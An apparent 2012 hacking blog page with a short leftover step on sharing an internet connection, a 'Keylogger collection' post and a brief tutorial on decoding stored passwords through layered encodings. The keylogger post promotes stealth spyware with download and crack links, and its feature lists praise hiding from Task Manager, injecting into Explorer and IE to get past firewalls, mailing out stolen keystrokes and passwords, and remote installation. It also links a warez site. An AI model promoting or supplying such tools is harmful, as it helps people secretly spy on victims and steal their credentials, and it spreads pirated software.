Step 4: Sharing the Internet Connection
After the virtual network has been activated, the main internet connection has to be shared with the hosted network in order to let other hosted network users to access the internet. For this, right click on the main network connection and open properties. In properties option, click on the sharing tab and from those options, choose the wireless connection which is virtually hosting the established Wi-Fi network.
After successfully completely all these steps, a user will be able to successfully share his or her internet with other users through the established network.
In some cases, other users will have to assign a static IP manually to access the network. This normally is the case with Smartphone users.

Sunday, 15 July 2012

Keylogger - collection


 


Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.

Writing software applications for keylogging is trivial, and like any computer program can be distributed as atrojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

lets see some of the key logger's

Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.[Download ][Crack ]

XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.{Windows 95, NT4, 98, Me, 2000, XP} [Download ][Crack ]

Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.

Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager![Download ][Crack ]

SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.[Download ]

Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible Specify log file location Uses a WH_JOURNALRECORD hooking procedure to capture everything typed Hide and unhide the interface by pressing Ctrl+Shift+F7 [Download ][Crack ]

Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is an stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.

Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.

All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!

The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.[Download ]


KLG:Download 

Type: Keylogger
A Plus: Download 
Type: Keylogger
Curiosity: Download 
Type: Keylogger
This keylogger will store all keystrokes in

C:\windows\KeyLogs.txt
Elitek3yl0gg3r10: Download 
Type: Keylogger
1)No Process Visible in any Task manager,Process explorer(2k,xp,9x)
2)Injects into Explorer.exe on startup and exiting the parent.
3)Firewall bypassing by injecting code into IE and sending mail
4)Invisible Startup, will not show in msconfig,autorun.exe (sysinternals)
5)Automatic Uninstall
6)Protucted Storage ,Cashed Passwords sender
7)No need ur own SMTP server(sending directly) to MX.
8)Remote Installer,Uninstaller
9)Built in Binder makes the keylogger same as the binded EXE(Icon,Version)
0)HTML formatted logs
11)Detect ICQ/MSN/AOL/Yahoo Chats.
12)Logging Window names,All keys typed in that window.
13)EXE Size is 12.7 KB
FKS: Download 
Type: Keylogger
Fearless Keyspy v2.0 has a very small (2.5 KB) assembly server,
with a low memory usage.
New features include a "webget" feature, a better GUI and lots of
deeper server and editor improvements
FKWP20: Download 
Type: Keylogger
1)logging all keystrokes
2) Download 2 urls cab files and extracting and executing the inside exes (Firewall bypass)
3) Protected storage (Outlook, IE stored passes),Cashed Dialup passes Sender
4) keystrokes ,passes will mail to the email id,daily or the log size is over
5) firewall bypassing by injecting code into IE and sending mail
6) No Process visible ,injects into Explorer.exe on startup and exiting
7) Active Setup Startup
8) EXE size is 11.9 KB
9) encrypted log file
10) File manager for controlling remote system
K3Yl0G3R: Download 
Type: Keylogger
For more hacking tools , warez , full appz , ip scanners and tons
of direct illegal downloads at http://www.openpc.co.nr
Key Copy: Download 
Type: Keylogger
You use KEYCOPY to keep a record of any keyboard activity on your computer.
This includes usage in Wordperfect 5.0,Multimate,Norton Editor. Keycopy copy's
each keystroke to a buffer within the KEYCOPY program area. When the keycopy
buffer has 200 keystrokes in memory, keycopy will copy the buffer to a file
with a date and time stamp. The file default is c:\keycopy. You can specify
drive,subdirectory and file name by having the parameter file called KC.PRM
in the subdirectory where KEYCOPY is executed from. If you change the KC.PRM
file and want the change to take effect with keycopy. The computer will have
to be rebooted, and Keycopy executed again. Keycopy has been tested and used
with DOS 3.3 and 4.0 and uses less than 3k of memory.
skl01: Download 
Type: Keylogger
1)Targetted keylogging(logs only the keys from the specifyed windows)
2)keystrokes will mail to the email id,daily or the log size is over
3)firewall bypassing by injecting code into IE and sending mail
4) Deleting all Cookies at installation.
5) EXE size is 8.5kb
6) we can create  our own keylogger using the editor,we can specify the window titiles (the keys need to log),our email id,smtp server,log size)

How to decrypt passwords


If you dont already know how to decrypt passwords that some files maybe protected with this is a simple tutorial on how to go about it ..

say for instance the password looks like this


Y=avb=MNn=qBXp7yS5RiUE7OUo7CaYpwSzqIYEapUj/=R0hXY6W5mLQ5mLQT

atom-128+ base-64+ tripo-5+ (these are the crypters )

so what you do is goto

http://www.crypo.com/


ok we know it has been crypted using the above crypters

copy the above crypted text

then find tripo-5 decrypt on the website and paste the code into the box and click on decrypt

then use base-64 and do the same as above

and finally use atom-128 do the same

there you should find the password


hope it helps a few people out